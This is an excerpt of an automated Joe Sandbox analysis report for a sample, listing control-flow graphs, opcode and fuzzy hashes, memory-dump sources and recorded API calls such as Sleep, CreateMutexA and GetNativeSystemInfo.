                                                                                                                                                                                                                                        • Opcode ID: 67972c9a134bc41c3fd5a41674d989fbf3962ff759d7473d061ee5678ff01d2a
                                                                                                                                                                                                                                        • Instruction ID: b2a18ab329e4cfbaf913152f70fa5a4f6b7907d865ef9bc58e0ff5744b55fcc6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67972c9a134bc41c3fd5a41674d989fbf3962ff759d7473d061ee5678ff01d2a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D3144717141449BFF1CEB68CD887BCBBE2EB85310F248698E464AB3E1DB759980CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 692 b89b49-b89b69 696 b89b6b-b89b77 692->696 697 b89b97-b89bb3 692->697 698 b89b79-b89b87 696->698 699 b89b8d-b89b94 call b9ecf8 696->699 700 b89be1-b89c00 697->700 701 b89bb5-b89bc1 697->701 698->699 704 b8a400 698->704 699->697 702 b89c2e-b8a3e6 call b99750 700->702 703 b89c02-b89c0e 700->703 706 b89bc3-b89bd1 701->706 707 b89bd7-b89bde call b9ecf8 701->707 709 b89c10-b89c1e 703->709 710 b89c24-b89c2b call b9ecf8 703->710 712 b8a423-b8a466 Sleep CreateMutexA 704->712 713 b8a400 call bb82fa 704->713 706->704 706->707 707->700 709->704 709->710 710->702 713->712
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 18363222cd4b0c4dd42647ae9882f8288c94f736497a6b414507be989c722c81
                                                                                                                                                                                                                                        • Instruction ID: 791a1d384dfa9845b5408d27f75b259105ce533c28955d6077ef36cd847dfb5f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18363222cd4b0c4dd42647ae9882f8288c94f736497a6b414507be989c722c81
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B43148717001449BEF18EB68DDC97ACB7E2DB85314F248698E424AB3E1C7799980CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 723 b89c7e-b89c9e 727 b89ccc-b89ce8 723->727 728 b89ca0-b89cac 723->728 729 b89cea-b89cf6 727->729 730 b89d16-b89d35 727->730 731 b89cae-b89cbc 728->731 732 b89cc2-b89cc9 call b9ecf8 728->732 733 b89cf8-b89d06 729->733 734 b89d0c-b89d13 call b9ecf8 729->734 735 b89d63-b8a3e6 call b99750 730->735 736 b89d37-b89d43 730->736 731->732 737 b8a405 731->737 732->727 733->734 733->737 734->730 740 b89d59-b89d60 call b9ecf8 736->740 741 b89d45-b89d53 736->741 743 b8a423-b8a466 Sleep CreateMutexA 737->743 744 b8a405 call bb82fa 737->744 740->735 741->737 741->740 744->743
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: a4e8ab8afc47586b52e26839b7256fce9d2ba1ecb426c609a3e29281034ada35
                                                                                                                                                                                                                                        • Instruction ID: 8dfaf68bb5cb394d8977957cdad528118f1c8bff41535a355cc732d7e6986210
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4e8ab8afc47586b52e26839b7256fce9d2ba1ecb426c609a3e29281034ada35
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 043128717101049BFF18EB78CD897ACBBE2DB85314F2486A8E424AB3E1D7759980CB55
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 754 b89ee8-b89f08 758 b89f0a-b89f16 754->758 759 b89f36-b89f52 754->759 762 b89f18-b89f26 758->762 763 b89f2c-b89f33 call b9ecf8 758->763 760 b89f80-b89f9f 759->760 761 b89f54-b89f60 759->761 768 b89fcd-b8a3e6 call b99750 760->768 769 b89fa1-b89fad 760->769 766 b89f62-b89f70 761->766 767 b89f76-b89f7d call b9ecf8 761->767 762->763 764 b8a40f 762->764 763->759 771 b8a414-b8a466 call bb82fa * 3 Sleep CreateMutexA 764->771 772 b8a40f call bb82fa 764->772 766->764 766->767 767->760 775 b89faf-b89fbd 769->775 776 b89fc3-b89fca call b9ecf8 769->776 772->771 775->764 775->776 776->768
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: c37a7b7fd0489127735fd693a5c8ad2f7705de98541ba093f4fe76b36b2d039c
                                                                                                                                                                                                                                        • Instruction ID: 25c0315b4a3502502e8a2d63385ebd2f5c07d23dadb2d430f5f9d7414ba778be
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c37a7b7fd0489127735fd693a5c8ad2f7705de98541ba093f4fe76b36b2d039c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 303126717001049BEF18EB78CD897ADB6E2DB85314F2482A8E121AB7E5DBB59980C751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 791 b8a01d-b8a03d 795 b8a06b-b8a087 791->795 796 b8a03f-b8a04b 791->796 797 b8a089-b8a095 795->797 798 b8a0b5-b8a0d4 795->798 799 b8a04d-b8a05b 796->799 800 b8a061-b8a068 call b9ecf8 796->800 803 b8a0ab-b8a0b2 call b9ecf8 797->803 804 b8a097-b8a0a5 797->804 805 b8a102-b8a3e6 call b99750 798->805 806 b8a0d6-b8a0e2 798->806 799->800 801 b8a414-b8a466 call bb82fa * 3 Sleep CreateMutexA 799->801 800->795 803->798 804->801 804->803 811 b8a0f8-b8a0ff call b9ecf8 806->811 812 b8a0e4-b8a0f2 806->812 811->805 812->801 812->811
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 002939ccdb2d5c9684caef4d73aac8bc22e8743212b25dca7225fda4210323cc
                                                                                                                                                                                                                                        • Instruction ID: ad8e59e2bbda7e1800b019f19c598c8dfb79e4cbdf2a898e4b9c68547b868d24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 002939ccdb2d5c9684caef4d73aac8bc22e8743212b25dca7225fda4210323cc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90313B717001449BFB18FB78CD897ADB7F2DB85314F208299E411AB3E2CB759980C752
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 826 b8a152-b8a172 830 b8a1a0-b8a1bc 826->830 831 b8a174-b8a180 826->831 834 b8a1ea-b8a209 830->834 835 b8a1be-b8a1ca 830->835 832 b8a182-b8a190 831->832 833 b8a196-b8a19d call b9ecf8 831->833 832->833 838 b8a419-b8a466 call bb82fa * 2 Sleep CreateMutexA 832->838 833->830 836 b8a20b-b8a217 834->836 837 b8a237-b8a3e6 call b99750 834->837 840 b8a1cc-b8a1da 835->840 841 b8a1e0-b8a1e7 call b9ecf8 835->841 842 b8a219-b8a227 836->842 843 b8a22d-b8a234 call b9ecf8 836->843 840->838 840->841 841->834 842->838 842->843 843->837
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 81507289ca1da1331fb0db8ffa613b45c469983ab3ca7945b9da05ab7ad3a787
                                                                                                                                                                                                                                        • Instruction ID: fc438253f41da5b8d7df66146bbeb65a7cf53882c25e7f63a4941b437d9f683f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81507289ca1da1331fb0db8ffa613b45c469983ab3ca7945b9da05ab7ad3a787
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 853126717001449BFB18FB68CD897ADBBF2DB86314F248299E421AB3E2C7759980C752
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 19af3da15f18dc92c65e5aaba9c1c14800f36f65b64cbb4410d6c28dc2172bb3
                                                                                                                                                                                                                                        • Instruction ID: c0a87dd15917c3d33747bdca2daf20093c46e75cd0b42a82f66cbd9d2e351da4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19af3da15f18dc92c65e5aaba9c1c14800f36f65b64cbb4410d6c28dc2172bb3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA11AB7231020497FB24AF68CD8977CB7E1EB85310F244299E4289B7E1DB799440CB42
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 909 b89e1f-b89e2b 910 b89e2d-b89e3b 909->910 911 b89e41-b89e6a call b9ecf8 909->911 910->911 912 b8a40a 910->912 917 b89e98-b8a3e6 call b99750 911->917 918 b89e6c-b89e78 911->918 915 b8a423-b8a466 Sleep CreateMutexA 912->915 916 b8a40a call bb82fa 912->916 916->915 919 b89e7a-b89e88 918->919 920 b89e8e-b89e95 call b9ecf8 918->920 919->912 919->920 920->917
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: e870c644c2620b4e208ea33b1bbec7f634fcd3e6b9bb6d186c10d8868cedf7da
                                                                                                                                                                                                                                        • Instruction ID: 4613ff35ce02be50544959291c3de81f8051b31d7ed98d7a68babedb5a785001
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e870c644c2620b4e208ea33b1bbec7f634fcd3e6b9bb6d186c10d8868cedf7da
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32216D727002449BFF18EB68DC8977CBBE1EB85311F2442ADE415AB3E1CB759580C751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 929 b8a326-b8a33e 930 b8a36c-b8a36e 929->930 931 b8a340-b8a34c 929->931 934 b8a379-b8a381 call b878b0 930->934 935 b8a370-b8a377 930->935 932 b8a34e-b8a35c 931->932 933 b8a362-b8a369 call b9ecf8 931->933 932->933 936 b8a41e-b8a458 call bb82fa Sleep CreateMutexA 932->936 933->930 946 b8a383-b8a38b call b878b0 934->946 947 b8a3b4-b8a3b6 934->947 938 b8a3bb-b8a3e6 call b99750 935->938 949 b8a45e-b8a466 936->949 946->947 952 b8a38d-b8a395 call b878b0 946->952 947->938 952->947 955 b8a397-b8a39f call b878b0 952->955 955->947 958 b8a3a1-b8a3a9 call b878b0 955->958 958->947 961 b8a3ab-b8a3b2 958->961 961->938
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: b3b215bf4414438c6c17e663659dff44900f04af64d66e78c90dac3677a02c4a
                                                                                                                                                                                                                                        • Instruction ID: e83290c1ae8107e1fcd8dc56383dbbd25f607a1a5943ba1ed7afd1453ab9351b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3b215bf4414438c6c17e663659dff44900f04af64d66e78c90dac3677a02c4a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C121F631284204A7FB24BB68888F76CB6D2DB41704F2445D6E410AA3F2CF759880C76B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B87A53
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1721193555-0
